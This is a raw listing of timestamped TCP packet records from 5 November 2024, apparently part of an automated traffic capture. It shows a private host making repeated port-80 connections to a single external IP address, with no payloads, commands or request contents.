                                                                                            Nov 5, 2024 23:52:33.321182966 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.326133966 CET804973737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.508646011 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.513753891 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.514045000 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.776776075 CET804973737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.855174065 CET804973737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.855463028 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.974004984 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.988900900 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.989723921 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.994412899 CET804973737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.994518042 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.994573116 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.994611979 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.994740009 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.999573946 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.044421911 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.044497967 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.053056002 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.058305979 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.287420034 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.287585974 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.292570114 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.352493048 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.357335091 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357346058 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357355118 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357359886 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357397079 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.357438087 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.357455015 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357489109 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357522011 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.357569933 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357620955 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.357703924 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357712030 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357718945 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.357750893 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.357769012 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.362274885 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.362332106 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.362334967 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.362344027 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.362389088 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.362406015 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.362413883 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.362421989 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.362462997 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.407411098 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.407541990 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.455542088 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.455590963 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.503619909 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.503676891 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.899202108 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.958323956 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.958338022 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.958347082 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.958394051 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.958661079 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.958710909 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.958822966 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.960521936 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.963480949 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.963531017 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.963607073 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.968624115 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.968632936 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.968641043 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.968651056 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.968691111 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.968713045 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.973516941 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973597050 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973604918 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973613977 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973632097 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973639965 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973648071 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973676920 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.973716021 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.973890066 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.973937035 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.978560925 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978614092 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.978626013 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978634119 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978641987 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978658915 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978669882 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978679895 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.978696108 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.978708029 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978717089 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978723049 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:34.978727102 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978769064 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978776932 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978794098 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978851080 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978859901 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.978945017 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.983479977 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.983577967 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.983695984 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.983747005 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:34.983799934 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.178817034 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:35.179758072 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:35.185832024 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.185911894 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:35.186131954 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.186526060 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:35.186801910 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:35.192692995 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.540827990 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:35.547523975 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.586251020 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.713176966 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.008297920 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.079199076 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.079267025 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.217073917 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.217223883 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.218266964 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.223434925 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.223449945 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.223488092 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.223539114 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.223640919 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.224756956 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.224806070 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.229887962 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.574080944 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.578969002 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.035279036 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.105963945 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.106033087 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.230787992 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.231004953 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.235987902 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.236145973 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.236274958 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.236437082 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.236496925 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.241489887 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.586878061 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.591830969 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262613058 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262666941 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262705088 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262729883 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.262790918 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.425426960 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.426894903 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.431024075 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.431088924 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.431766987 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.431832075 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.431940079 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.436755896 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.790508032 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.795547009 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.057285070 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.062376022 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.062510967 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.062621117 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.065615892 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.067464113 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.071046114 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.071096897 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.197110891 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.202002048 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.202100039 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.202200890 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.207005978 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.415720940 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.420819998 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.420861006 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.555944920 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.560802937 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.864979982 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.940107107 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.940215111 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.024277925 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.101548910 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.101608992 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.232307911 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.232333899 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.233521938 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.237670898 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.237907887 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.238181114 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.238234997 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.238321066 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.238384008 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.238478899 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.243330956 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.590897083 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.595936060 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.049932003 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.102310896 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.125943899 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.305434942 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.378390074 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.383565903 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.383646965 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.383840084 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.388791084 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.743778944 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.891171932 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.205102921 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.273930073 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.273988962 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.511647940 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.512092113 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.517040968 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.517129898 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.517429113 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.517512083 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.517615080 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.522464991 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.867999077 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.872884035 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.338536024 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.409671068 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.412168026 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.600125074 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.600507021 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.605317116 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.605381012 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.605439901 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.605472088 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.607105970 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.611938953 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.961815119 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.966801882 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.419316053 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.492446899 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.492511988 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.614573956 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.615333080 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.620240927 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.620325089 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.620326996 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.620372057 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.620465994 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.625566006 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.947005033 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.947463989 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.952428102 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.952564001 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.952656984 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.957540035 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.999794006 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.070702076 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.075664997 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.075737953 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.075854063 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.082360029 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.305617094 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.430764914 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.493952990 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494024992 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.494072914 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494179964 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.494774103 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494832993 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494862080 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.498943090 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.772169113 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.851747036 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.851804018 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.897156954 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.965421915 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.965512037 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.287731886 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.287807941 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.288765907 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293232918 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.293287039 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293622971 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.293690920 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293766975 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.293800116 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293812037 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.298579931 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.649306059 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.654371023 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.105568886 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.175134897 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.175204992 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.305011034 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.305649042 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.310296059 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.310374975 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.310431004 CET804975937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.310488939 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.310585022 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.315452099 CET804975937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.664904118 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.670116901 CET804975937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:48.131917953 CET804975937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:48.196063042 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.204116106 CET804975937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:48.305521011 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.349841118 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.350560904 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.355087996 CET804975937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:48.355150938 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.355410099 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:48.355463982 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.355578899 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.360373020 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:48.712156057 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:48.717233896 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:49.166454077 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:49.235811949 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:49.235901117 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:49.363496065 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:49.365139961 CET4976180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:49.696065903 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.305443048 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.319716930 CET804976137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.319731951 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.319741011 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.319751978 CET804976037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:50.319823980 CET4976180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.319848061 CET4976080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.319996119 CET4976180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:50.324718952 CET804976137.44.238.250192.168.2.4
